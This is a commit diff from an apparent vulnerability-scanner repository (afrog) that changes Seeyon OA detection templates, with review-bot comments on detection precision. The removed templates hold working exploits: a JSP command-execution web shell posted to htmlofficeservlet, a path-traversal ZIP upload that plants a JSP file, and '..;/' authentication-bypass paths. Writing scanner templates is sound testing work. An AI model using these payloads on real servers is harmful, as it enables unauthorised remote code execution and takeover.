Projects STRLCPY afrog Commits 53176a2f
    pocs/afrog-pocs/b-disclosure/seeyon-session-leak.yaml
    skipped 11 lines
    12 12   request:
    13 13   method: GET
    14 14   path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll
    15  - expression: response.status == 200 && response.body.bcontains(b"<SessionList>\r\n<Session>\r\n<usrID>")
     15 + expression: response.status == 200 && response.body.bcontains(b"<usrID>") && response.body.bcontains(b"<sessionID>")
    16 16  expression: r0()
    17 17   
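Review bot: The new expression on line 15 accepts any 200 response whose body contains `<usrID>` and `<sessionID>` anywhere, which drops the anchor on the `<SessionList>` root element that the old check had; the old check presumably failed only because it hard-coded CRLF line breaks between the elements, not because of the root element itself. Keeping the root element without the line-ending dependency retains that precision: `expression: response.status == 200 && response.body.bcontains(b"<SessionList>") && response.body.bcontains(b"<usrID>") && response.body.bcontains(b"<sessionID>")`. The enclosing `r0` rule starts above this hunk (11 skipped lines), so its `request` header is not visible here.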
    pocs/afrog-pocs/c-unauthorized/seeyon-ajax-unauthorized-access.yaml
    1  -id: seeyon-ajax-unauthorized-access
    2  - 
    3  -info:
    4  - name: seeyon-ajax-unauthorized-access
    5  - author: x1n9Qi8
    6  - severity: high
    7  - reference:
    8  - - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
    9  - - https://buaq.net/go-53721.html
    10  - 
    11  - 
    12  -rules:
    13  - r0:
    14  - request:
    15  - method: GET
    16  - path: /seeyon/thirdpartyController.do.css/..;/ajax.do
    17  - expression: response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null"))
    18  - r1:
    19  - request:
    20  - method: GET
    21  - path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
    22  - expression: response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json")
    23  -expression: r0() && r1()
    24  - 
    pocs/afrog-pocs/e-vulnerability/seeyon-a8-htmlofficeservlet-upload.yaml
     1 +id: seeyon-a8-htmlofficeservlet-upload
     2 + 
     3 +info:
     4 + name: Seeyon 致远OA A8 htmlofficeservlet 任意文件上传漏洞
     5 + author: zan8in
     6 + severity: critical
     7 + description: |
     8 + 远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件,写入成功后可执行任意系统命令进而控制目标服务器
     9 + title="致远A8-V5协同管理软件 V6.1sp1"
     10 + reference:
     11 + - https://www.cxyzjd.com/article/guangying177/110177339
     12 + - https://github.com/sectestt/CNVD-2019-19299
     13 + - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20htmlofficeservlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
     14 + 
     15 + 
     16 +rules:
     17 + r0:
     18 + request:
     19 + method: GET
     20 + path: /seeyon/htmlofficeservlet
     21 + expression: response.status == 200 && response.body.bcontains(b'DBSTEP') && response.body.bcontains(b'htmoffice operate')
     22 +expression: r0()
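Review bot: The `r0` expression on line 21 only confirms that a GET to `/seeyon/htmlofficeservlet` returns the `DBSTEP` / `htmoffice operate` banner, i.e. that the servlet is exposed; it does not establish that the file-write flaw is actually present, so patched installs that still serve the servlet will be reported at `severity: critical`. State that in `description`, e.g. add the line `Detection is fingerprint-based (servlet banner only) and may include patched hosts.` to the block on lines 7–9. The advisory id `CNVD-2019-19299`, which the replaced template carried as its `id`, now survives only inside a reference URL on line 12; mention it in `name` or `description` so the template stays searchable by advisory id. The `title="..."` line inside `description` reads as a FOFA query rather than descriptive text and would be clearer labelled as such.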
    pocs/afrog-pocs/e-vulnerability/seeyon-session-upload-webshell.yaml
    1  -id: seeyon-session-upload-webshell
    2  - 
    3  -info:
    4  - name: seeyon session upload webshell
    5  - author: zan8in
    6  - severity: critical
    7  - description: fofa app="致远互联-Seeyon-Server"
    8  - 
    9  -rules:
    10  - r0:
    11  - request:
    12  - method: POST
    13  - path: /seeyon/thirdpartyController.do
    14  - headers:
    15  - Content-Type: "application/x-www-form-urlencoded"
    16  - body: |
    17  - method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
    18  - expression: |
    19  - response.status == 200 && response.body.bcontains(bytes("a8genius.do"))
    20  - output:
    21  - search: '"(?P<cokies>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}))".bsubmatch(response.body)'
    22  - cokies: search["cokies"]
    23  -
    24  - r1:
    25  - request:
    26  - method: POST
    27  - path: /seeyon/fileUpload.do?method=processUpload
    28  - headers:
    29  - Content-Type: "multipart/form-data;boundary=---------------------------310945848325598073452977702743"
    30  - Cookie: "JSESSIONID={{cokies}}"
    31  - body: |-
    32  - -----------------------------310945848325598073452977702743
    33  - Content-Disposition: form-data; name="file1"; filename="1.png"
    34  - Content-Type: image/png
    35  -
    36  - %50%4b%03%04%14%00%00%00%08%00%0e%4e%3b%53%70%71%65%02%85%03%00%00%37%0a%00%00%0b%00%00%00%2e%2e%2f%68%31%32%33%2e%6a%73%70%b5%56%69%8f%d3%30%10%fd%2b%26%12%92%2d%22%8b%73%05%84%80%b6%bb%8b%84%b8%55%10%48%88%0f%8e%33%6d%03%b9%b0%1d%48%89%fa%df%19%1f%e9%c1%96%42%11%7c%d8%8d%63%bf%19%cf%7b%7e%f1%f4%c1%d5%2b%64%6a%54%51%cf%49%2f%d3%e8%96%3c%81%eb%d9%5d%71%4f%de%b8%73%f3%e6%6d%11%25%e3%6a%2b%b4%4e%23%fb%7f%33%57%e5%77%52%fc%a3%76%f6%5a%2f%59%42%64%89%43%f2%9e%40%6f%a0%ce%35%39%b3%ef%cf%1a%91%83%1a%da%2e%2b%0b%49%de%d3%ad%49%f2%9d%0d%ba%6b%41%d1%ef%2c%59%05%84%5b%27%af%69%b6%34%f0%e1%23%91%19%1b%14%98%4e%d5%c4%41%79%0e%b3%a2%06%87%a2%32%8b%c9%f5%18%31%bc%84%7a%6e%16%98%85%8c%79%42%7c%3f%26%d2%71%d6%34%25%88%9a%54%6c%20%46%2d%87%4f%e2%ab%e8%b9%54%cb%d6%34%fc%ac%68%17%58%91%4c%f7%cc%f2%39%98%27%b5%36%a2%96%40%a3%d3%8b%69%c4%12%c9%8b%ba%30%b4%7a%74%e3%fe%cd%b8%86%6f%64%27%4e%b7%20%f9%14%24%56%fe%14%96%53%7c%a3%bd%b4%69%26%58%8c%a6%2c%f6%59%58%12%a8%49%9e%37%8f%8b%5a%94%54%a3%8e%2b%29%8c%5c%10%7a%d1%4b%68%4d%d1%d4%04%d6%22%d4%5d%59%22%62%45%02%4d%ac%ca%e0%63%73%26%34%0c%35%23%43%18%62%28%49%7d%24%f2%26%8e%38%d7%20%3b%55%98%25%7f%0e%5a%8b%39%9c%17%73%d0%86%54%49%85%d8%03%88%5d%31%9e%9f%df%41%31%2a%de%b5%b9%30%40%f5%16%47%77%34%3a%9c%0c%f5%5c%31%f5%a8%15%af%84%59%f0%49%31%7f%52%1b%98%a3%07%6e%c4%a4%e2%b9%db%03%d1%dc%34%be%7a%7a%e3%c4%be%bc%6d%f1%f0%cf%84%06%6a%0f%f9%b2%40%c8%76%15%24%c2%47%42%7e%21%50%86%19%4e%6e%5f%d4%b2%c9%61%74%46%86%52%99%85%6a%be%69%b2%49%38%38%87%05%7c%12%a2%bf%8a%b2%83%1d%29%fd%7a%ea%c0%7c%d6%a8%17%a2%42%55%1c%bf%ce%14%25%9f%b8%75%94%e8%65%f6%09%a4%21%7e%67%85%39%7c%a4%d5%eb%39%98%45%93%d3%08%87%61%39%8a%dd%16%0c%3d%f6%b5%f9%0c%d4%63%c3%64%32%56%11%4e%9a%85%20%9b%ca%7f%16%6c%3b%2b%b8%d5%37%41%4d%cc%6c%0f%c0%e1%90%fa%10%3e%13%ee%3f%dd%d5%7a%c7%90%d3%a3%7d%ed%1e%8e%a0%5f%1e%80%53%84%ec%97%44%77%35%af%0a%2d%f9%e4%74%7a%71%72%7b%24%8a%6e%ff%95%32%b8%f3%da%67%08%fb%1b%d6%ff%8f%ed%4d%eb%b7%60%38%5f%da%25%cb%85%cd%02%9d%73%b0%5b%84%e2%ff%c4%72%3e%fa%
1f%58%2e%87%83%96%3b%87%63%2c%e7%ab%62%98%f3%80%f8%6e%f5%b2%f8%9e%fb%25%f1%73%38%56%fc%e3%ac%36%12%dc%58%2d%87%3f%b4%da%11%6c%27%dd%6c%06%ea%ff%71%de%6b%b8%ab%0f%1f%5c%b5%9d%2c%78%05%af%60%91%ee%d8%4d%c1%97%2e%dc%d9%af%84%42%75%0c%28%d7%b0%f1%3a%76%e8%9e%da%47%4c%66%a2%d4%c0%92%62%46%a8%c6%db%1e%b7%b4%31%a7%06%cb%cf%3a%bc%d8%b1%f7%2f%4b%6c%da%11%4b%53%67%89%61%84%e9%bd%30%d7%12%df%53%b3%28%f4%4f%b2%6d%f5%7f%7b%cd%bf%76%05%30%24%0d%58%c1%10%0a%fe%39%eb%58%bb%8e%62%07%4f%9c%dd%8b%86%db%5e%73%aa%94%58%be%ec%4c%db%19%94%1b%44%45%84%52%f8%9e%da%1a%0e%02%e9%fa%23%99%a5%d4%ff%32%61%bf%a1%cf%7e%32%cb%8c%63%c5%28%1e%f5%7b%6e%4d%b4%d8%32%cf%1a%6c%6e%bd%b1%bd%4f%b7%4d%ad%c1%a6%7d%87%4d%d5%92%e7%df%ec%80%62%cf%e6%ba%cb%b4%ef%76%d7%63%ec%77%98%65%d3%ff%0e%06%ef%f4%b3%3e%14%81%b1%6b%ba%b6%0f%1b%d5%01%63%47%14%e1%4a%58%ed%ff%1d%82%a6%fb%01%50%4b%03%04%14%00%00%00%00%00%f5%64%8c%52%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%2e%2e%2f%50%4b%03%04%14%00%08%08%08%00%dd%74%24%51%00%00%00%00%00%00%00%00%00%00%00%00%0a%00%00%00%6c%61%79%6f%75%74%2e%78%6d%6c%e3%02%00%50%4b%07%08%93%06%d7%32%03%00%00%00%01%00%00%00%50%4b%01%02%3f%00%14%00%00%00%08%00%0e%4e%3b%53%70%71%65%02%85%03%00%00%37%0a%00%00%0b%00%24%00%00%00%00%00%00%00%20%00%00%00%00%00%00%00%2e%2e%2f%68%31%32%33%2e%6a%73%70%0a%00%20%00%00%00%00%00%01%00%18%00%64%a2%32%c4%41%b3%d7%01%64%a2%32%c4%41%b3%d7%01%53%52%2f%d9%57%2f%d7%01%50%4b%01%02%3f%00%14%00%00%00%00%00%f5%64%8c%52%00%00%00%00%00%00%00%00%00%00%00%00%03%00%24%00%00%00%00%00%00%00%10%00%00%00%ae%03%00%00%2e%2e%2f%0a%00%20%00%00%00%00%00%01%00%18%00%50%a5%c8%d9%55%2f%d7%01%50%a5%c8%d9%55%2f%d7%01%50%a5%c8%d9%55%2f%d7%01%50%4b%01%02%14%00%14%00%08%08%08%00%dd%74%24%51%93%06%d7%32%03%00%00%00%01%00%00%00%0a%00%00%00%00%00%00%00%00%00%00%00%00%00%cf%03%00%00%6c%61%79%6f%75%74%2e%78%6d%6c%50%4b%05%06%00%00%00%00%03%00%03%00%ea%00%00%00
    37  -
    38  - -----------------------------310945848325598073452977702743
    39  - Content-Disposition: form-data; name="firstSave"
    40  - 
    41  - true
    42  - -----------------------------310945848325598073452977702743
    43  - Content-Disposition: form-data; name="callMethod"
    44  - 
    45  - resizeLayout
    46  - -----------------------------310945848325598073452977702743
    47  - Content-Disposition: form-data; name="isEncrypt"
    48  - 
    49  - 0
    50  - -----------------------------310945848325598073452977702743
    51  - Content-Disposition: form-data; name="takeOver"
    52  - 
    53  - false
    54  - -----------------------------310945848325598073452977702743
    55  - Content-Disposition: form-data; name="type"
    56  - 
    57  - 0
    58  - -----------------------------310945848325598073452977702743--
    59  - expression: |
    60  - response.status == 200 && response.body.bcontains(bytes("fileurls"))
    61  -expression: r0() && r1()
    pocs/afrog-pocs/f-CNVD/2021/CNVD-2021-01627.yaml
     1 +id: CNVD-2021-01627
     2 + 
     3 +info:
     4 + name: Seeyon 致远 OA 文件上传
     5 + author: gy741
     6 + severity: critical
     7 + description: fofa app="致远互联-Seeyon-Server"
     8 + reference:
     9 + - https://www.programmersought.com/article/92658169875/
     10 + - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
     11 + - https://buaq.net/go-53721.html
     12 + - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20ajax.do%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%20CNVD-2021-01627.html
     13 + 
     14 + 
     15 +rules:
     16 + r0:
     17 + request:
     18 + method: GET
     19 + path: /seeyon/thirdpartyController.do.css/..;/ajax.do
     20 + expression: response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null")) && response.content_type.contains("text/html")
     21 +expression: r0()
     22 + 
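Review bot: `description` on line 7 holds a FOFA search query (`fofa app="致远互联-Seeyon-Server"`) rather than a description of the finding, and the single `r0` check on lines 19–20 verifies only that the `..;/` path reaches `ajax.do` (the `java.lang.NullPointerException:null` body presumably results from calling it without parameters), not that the upload named in `name` is possible. A sentence such as `description: Servlet-filter bypass via ..;/ path normalisation to ajax.do; this check confirms only the bypass (NPE without parameters), not the upload itself.` would tell operators how much confidence the `critical` result carries. Style nit: the doubled blank lines 13–14 and the trailing blank line 22 do not match the other new template in this commit.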
    pocs/afrog-pocs/g-CVE/2019/CNVD-2019-19299.yaml
    1  -id: CNVD-2019-19299
    2  - 
    3  -info:
    4  - name: 致远OA A8 htmlofficeservlet 任意文件上传漏洞
    5  - author: zan8in
    6  - severity: critical
    7  - description: |
    8  - 远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件,写入成功后可执行任意系统命令进而控制目标服务器
    9  - title="致远A8-V5协同管理软件 V6.1sp1"
    10  - reference:
    11  - - https://www.cxyzjd.com/article/guangying177/110177339
    12  - - https://github.com/sectestt/CNVD-2019-19299
    13  - - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20htmlofficeservlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
    14  - 
    15  -set:
    16  - randstr: randomLowercase(16)
    17  -rules:
    18  - r0:
    19  - request:
    20  - method: POST
    21  - path: /seeyon/htmlofficeservlet
    22  - body: |
    23  - DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
    24  - OPTION=S3WYOSWLBSGr
    25  - currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
    26  - = WUghPB3szB3Xwg66 the CREATEDATE
    27  - recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
    28  - originalFileId = wV66
    29  - originalCreateDate = wUghPB3szB3Xwg66
    30  - FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
    31  - needReadFile = yRWZdAS6
    32  - originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
    33  - <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
    34  - expression: response.body.bcontains(b'htmoffice operate')
    35  - r1:
    36  - request:
    37  - method: GET
    38  - path: /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig
    39  - expression: response.status == 200 && response.body.bcontains(b'Windows IP')
    40  -expression: r0() && r1()